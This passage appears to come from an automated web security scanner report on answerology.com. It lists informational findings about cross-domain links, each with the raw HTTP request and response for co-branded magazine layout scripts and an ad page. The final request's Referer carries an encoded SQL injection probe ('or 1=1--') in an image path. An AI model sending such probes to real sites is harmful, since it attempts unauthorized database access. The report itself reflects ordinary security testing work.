<li><a href="http://www.cosmopolitan.com/style/hairstyles/">Cosmo Hair Tips & Tricks</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/fashion/">Fashion Trends</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/beauty/">Beauty Secrets</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/hot-guys/bachelors/">50 Hottest Bachelors</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/celebrities/redcarpet/">Red Carpet Fashion</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/celebrities/exclusive/">Celebrity Interviews</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/horoscopes/">Bedside Astrologer</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/you/advice/best-cover-girl-submissions/">Real-Girl Cosmo Cover Girls</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/magazine/cosmo-cover-gallery">10 Years of Cosmo Covers</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/you/healthy/sex/">Sexual Health A-Z</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/fun/cover/">Be a Cosmo Cover Girl</a>
...[SNIP]...
<li><a href="http://games.cosmopolitan.com/">Free Online Games</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/hair-blowout">Celebrity Hair Battles</a>
...[SNIP]...
18.133. http://www.answerology.com/cobrands/delish/DelishLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/delish/DelishLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/delish/DelishLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Sep 2010 15:56:04 GMT
Accept-Ranges: bytes
ETag: "956f2aab755cb1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:40 GMT
Content-Length: 9101
Connection: close

function DelishLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "delish";
...[SNIP]...
<div class="links" style="margin-left:0;border-left:13px solid #000000;border-bottom:13px solid #000000;padding-bottom:18px;`">' +
'<a style="display:block" href="http://www.cosmopolitan.com/" >' +
'<img class="pic" src="/cobrands/delish/images/footer-logo.png" alt="cosmopolitan" style="margin:0 0 18px 8px" />
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/positions/">Sex Positions</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/archive/you/quiz/">Cosmo Quizzes</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/tips/">Sex Tips From Guys</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/body-language/">Body Language Decoder</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/makeover/">Virtual Hairstyle Salon</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/hairstyles/">Cosmo Hair Tips & Tricks</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/fashion/">Fashion Trends</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/beauty/">Beauty Secrets</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/hot-guys/bachelors/">50 Hottest Bachelors</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/celebrities/redcarpet/">Red Carpet Fashion</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/celebrities/exclusive/">Celebrity Interviews</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/horoscopes/">Bedside Astrologer</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/you/advice/best-cover-girl-submissions/">Real-Girl Cosmo Cover Girls</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/magazine/cosmo-cover-gallery">10 Years of Cosmo Covers</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/you/healthy/sex/">Sexual Health A-Z</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/fun/cover/">Be a Cosmo Cover Girl</a>
...[SNIP]...
<li><a href="http://games.cosmopolitan.com/">Free Online Games</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/hair-blowout">Celebrity Hair Battles</a>
...[SNIP]...
18.134. http://www.answerology.com/cobrands/goodhousekeeping/GoodhousekeepingLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/goodhousekeeping/GoodhousekeepingLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 09 Sep 2011 22:02:25 GMT
Accept-Ranges: bytes
ETag: "bb6685283c6fcc1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:36 GMT
Content-Length: 6162
Connection: close

function GoodhousekeepingLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name =
...[SNIP]...
<div id="footer-home">' +
'<a href="http://www.goodhousekeeping.com/" >' +
'<img class="pic" src="/cobrands/goodhousekeeping/images/footer-logo.png" alt="redbook" />
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/beauty/makeover/">Makeover Magic</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/family/pets/">Pets</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/family/good-housekeeping-games-quizzes">Games</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/home/home-decor-gallery/">Home Decoration</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/win/">Sweepstakes</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/recipefinder/">Recipe Finder</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/home/getting-organized/">Clutter Solution</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/health/fitness/">Fitness &amp; Exercise</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/beauty/hair/">Hair Ideas</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/health/diet/">Diet Advice</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/food/quick/">Quick &amp; Easy Recipes</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/health/diseases/heart-health-exercise?click=main_sr">Fashion</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/beauty/virtual-model/">Virtual Fashion Model</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/product-testing/reviews-tests/childrens-toys/">Product Tests</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/family/celebrity/">Celebrity Families</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/money/">Saving Money</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/food/cooking/">Cooking Advice</a>
...[SNIP]...
<li><a href="http://www.goodhousekeeping.com/food/holidays/">Holidays</a>
...[SNIP]...
18.135. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/marieclaire/MarieClaireLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/marieclaire/MarieClaireLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 29 Jul 2009 02:35:24 GMT
Accept-Ranges: bytes
ETag: "23a9173af5fca1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:34 GMT
Content-Length: 6486
Connection: close

function MarieClaireLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "mar
...[SNIP]...
<p>Note: If you have a screen name and password to <a href="http://www.marieclaire.com">www.marieclaire.com</a>
...[SNIP]...
<div id="footer-home">' +
'<a href="http://www.marieclaire.com/" >' +
'<img class="pic" src="/cobrands/marieclaire/images/footer-logo.png" alt="marie claire" />
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/hairstyles/">Hot Hairstyles</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/fashion/virtual-model/">Virtual Model</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/shopping/giveaway/">Daily Giveaways</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/life/sex/dating/">Sex and the Single Guy</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/horoscopes/">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/life/career/">Career and Money</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/fashion/">Fashion and Style</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/beauty/">Beauty 101</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/life/career/career-advice/">Cubicle Coach Blog</a>
...[SNIP]...
<li><a href="http://games.marieclaire.com/">Games</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/hairstyles/virtual-salon/">Virtual Hair Salon</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/celebrity/video/?maven_playerId=flash_test&maven_referralPlaylistId=55a1845375b997878d9ab6056745026a11cc88a9&maven_referralObject=732358375">Behind The Scenes Video</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/beauty/video-tips/?maven_playerId=flash_test&maven_referralPlaylistId=7289510c8560aa936062e1c1c7c4d3174bf5747e&maven_referralObject=623280783">Beauty Videos</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/shopping/">Shopping</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/hair/hairstyles/celebrity-hair/">Celebrity Hairstyles Game</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/world/">Eye On The World</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/world/travel/">Travel Diaries</a>
...[SNIP]...
<li><a href="http://www.marieclaire.com/life/healthy/calculators/health-fitness-tools">Health and Fitness Tools</a>
...[SNIP]...
18.136. http://www.answerology.com/cobrands/quickandsimple/QuickAndSimpleLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/quickandsimple/QuickAndSimpleLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/quickandsimple/QuickAndSimpleLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 29 Jul 2009 02:35:24 GMT
Accept-Ranges: bytes
ETag: "80b1a3af5fca1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:39 GMT
Content-Length: 5561
Connection: close

function QuickAndSimpleLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "
...[SNIP]...
<p>Note: If you have a screen name and password to <a href="http://www.quickandsimple.com">www.quickandsimple.com</a>
...[SNIP]...
<div id="footer-home">' +
'<a href="http://www.quickandsimple.com/" >' +
'<img class="pic" src="/cobrands/quickandsimple/images/footer-logo.png" alt="quick and simple" />
...[SNIP]...
<li><a href="http://www.quickandsimple.com/saving-money/coupons/">Free Coupons</a>
...[SNIP]...
<li><a href="http://www.quickandsimple.com/best-recipes/">Recipes</a>
...[SNIP]...
<li><a href="http://games.quickandsimple.com/">Games</a>
...[SNIP]...
<li><a href="http://www.quickandsimple.com/fun/horoscopes/">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.quickandsimple.com/fun/pet-pictures/">Cute Pet Photos</a>
...[SNIP]...
<li><a href="http://www.quickandsimple.com/sweepstakes-contests/">Win Stuff</a>
...[SNIP]...
<li><a href="http://www.quickandsimple.com/fun/inspirational-quotes/">Inspirational Mottos</a>
...[SNIP]...
<li><a href="http://www.quickandsimple.com/archives/diet-weight-loss/success-stories/10;1">Weight-Loss Success Stories</a>
...[SNIP]...
<li><a href="http://www.quickandsimple.com/natural-living-guide?natural_remedies">Natural Remedies</a>
...[SNIP]...
18.137. http://www.answerology.com/cobrands/realbeauty/RealBeautyLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/realbeauty/RealBeautyLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/realbeauty/RealBeautyLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 20 Sep 2010 15:07:33 GMT
Accept-Ranges: bytes
ETag: "9657538dd558cb1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:39 GMT
Content-Length: 6145
Connection: close

function RealbeautyLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "real
...[SNIP]...
<div class="links" style="margin-left:0;border-left:13px solid #000000;border-bottom:13px solid #000000;padding-bottom:18px;`">' +
'<a style="display:block" href="http://www.cosmopolitan.com/" >' +
'<img class="pic" src="/cobrands/realbeauty/images/footer-logo.png" alt="cosmopolitan" style="margin:0 0 18px 8px" />
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/positions/">Sex Positions</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/archive/you/quiz/">Cosmo Quizzes</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/tips/">Sex Tips From Guys</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/sex-love/body-language/">Body Language Decoder</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/makeover/">Virtual Hairstyle Salon</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/hairstyles/">Cosmo Hair Tips & Tricks</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/fashion/">Fashion Trends</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/beauty/">Beauty Secrets</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/hot-guys/bachelors/">50 Hottest Bachelors</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/celebrities/redcarpet/">Red Carpet Fashion</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/celebrities/exclusive/">Celebrity Interviews</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/horoscopes/">Bedside Astrologer</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/you/advice/best-cover-girl-submissions/">Real-Girl Cosmo Cover Girls</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/magazine/cosmo-cover-gallery">10 Years of Cosmo Covers</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/you/healthy/sex/">Sexual Health A-Z</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/fun/cover/">Be a Cosmo Cover Girl</a>
...[SNIP]...
<li><a href="http://games.cosmopolitan.com/">Free Online Games</a>
...[SNIP]...
<li><a href="http://www.cosmopolitan.com/style/hair-blowout">Celebrity Hair Battles</a>
...[SNIP]...
18.138. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/redbookmag/RedbookmagLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/redbookmag/RedbookmagLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 29 Jul 2009 02:35:24 GMT
Accept-Ranges: bytes
ETag: "3ad01e3af5fca1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:32 GMT
Content-Length: 5697
Connection: close

function RedbookmagLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "redb
...[SNIP]...
<div id="footer-home">' +
'<a href="http://www.redbookmag.com/" >' +
'<img class="pic" src="/cobrands/redbookmag/images/footer-logo.png" alt="redbook" />
...[SNIP]...
<li><a href="http://www.redbookmag.com/home/mom-blog/">The Mom Moment</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/love/sex/">Hot and Bothered</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/home/life/">The Serving Dish</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/your/beauty-fashion/">Walk-In Closet</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/love/reviews/">Sex-Life Road Test</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/love/hot-husbands-2008">Hot Husbands</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/archive/love/tip">Love Life Tips</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/sweeps/">Free Stuff</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/your/celebrity/">Celebrities</a>
...[SNIP]...
<li><a href="http://games.redbookmag.com/">Games</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/horoscopes/">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/home/parenting/">Parenting</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/your/">Your Life</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/home/">Home Life</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/love/ ">Love Life</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/recipefinder/">Recipe Finder</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/contribute/home/moms/">How She Does It</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/home/pet-pics/">Pets</a>
...[SNIP]...
18.139. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cobrands/seventeen/SeventeenLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cobrands/seventeen/SeventeenLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 29 Jun 2010 13:31:17 GMT
Accept-Ranges: bytes
ETag: "b60905a8f17cb1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:38 GMT
Content-Length: 5699
Connection: close

function SeventeenLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
CoachesLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "seven
...[SNIP]...
<div id="footer-home">' +
'<a href="http://www.seventeen.com/" >' +
'<img class="pic" src="/cobrands/seventeen/images/footer-logo.png" alt="seventeen" />
...[SNIP]...
<li><a href="http://www.seventeen.com/hair-skin-makeup/salon/">Beauty Salon</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fun-stuff/freebies/">Freebies</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fun-stuff/quizzes/#quizzes_funstuff/">Quizzes</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/hair-skin-makeup/hair-ideas/">Hair Ideas</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fashion/love-it-leave-it/">Rate This Look</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/hair-skin-makeup/makeover/">Celebrity Makeover</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fashion/best-tips/">Fashion Tips</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/dating/guys-talk/">Guys Talk</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fun-stuff/17-buzz/">17 Buzz Blog</a>
...[SNIP]...
<li><a href="http://games.seventeen.com/Default.aspx">Games</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fun-stuff/horoscopes/">Horoscopes</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/dating/">Dating Tips</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fun-stuff/today/daily-secret/">Daily Secret</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/health-sex-fitness/special/body-peace-nplp-0508/">Body Peace Project</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/dating/17-questions/">17 Celebrity Questions</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/dating/dating-diaries/">Dating Diaries</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/fun-stuff/prom/">Prom</a>
...[SNIP]...
<li><a href="http://www.seventeen.com/health-sex-fitness/questions-answers/">Your Body</a>
...[SNIP]...
18.140. http://www.answerology.com/cssjs/CoachesLayout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cssjs/CoachesLayout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cssjs/CoachesLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 29 Jul 2009 02:35:25 GMT
Accept-Ranges: bytes
ETag: "51f7253af5fca1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:26 GMT
Content-Length: 2658
Connection: close

function CoachesLayout( adsFree, securedTemplates, headerAdFreeTemplates, template) {
AnswerologyLayout.call(this, adsFree, securedTemplates, headerAdFreeTemplates, template);
this.name = "coa
...[SNIP]...
<li class="external"><a href="http://www.careerbuilder.com/default.aspx?cbsid=66176dd5008d44a4927144d49462e9e5-257796980-R1-4&lr=cbanswer&cbRecursionCnt=1&siteid=answer" title="Get Happy At Work">Get Happy At Work</a>
...[SNIP]...
18.141. http://www.answerology.com/cssjs/Layout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /cssjs/Layout.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cssjs/Layout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 09 Sep 2010 13:30:19 GMT
Accept-Ranges: bytes
ETag: "77de57252350cb1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:25 GMT
Content-Length: 11623
Connection: close

function AnswerologyLayout(adsFree, securedTemplates, headerAdFreeTemplates, template) {
this.name = "answerology";
this.adsFree = adsFree;
this.headerAdFreeTemplates = headerAdFreeTemplat
...[SNIP]...
<li class="external"><a href="http://www.careerbuilder.com/index.htm?lr=cbanswer&amp;siteid=answer" title="Get Happy At Work">Get Happy At Work</a>
...[SNIP]...
18.142. http://www.answerology.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.aspx?template=ads.ascx&topic=homepage&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:45 GMT
Content-Length: 1018
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html>
<body width="728" height="90" style="margin:0;text-align:center;text-valign:center;" >
<script type="text/javascript">
var segQS = parent.segQS;
</script>
<!-- begin 728x90 ad tag (tile=1)
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/hdm.answerology/;site=answerology;cat=homepage;demo=adult;tile=1;sect=answerology;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/hdm.answerology/;site=answerology;cat=homepage;demo=adult;tile=1;sect=answerology;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
18.143. http://www.answerology.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.aspx?template=about_our_ads.ascx HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
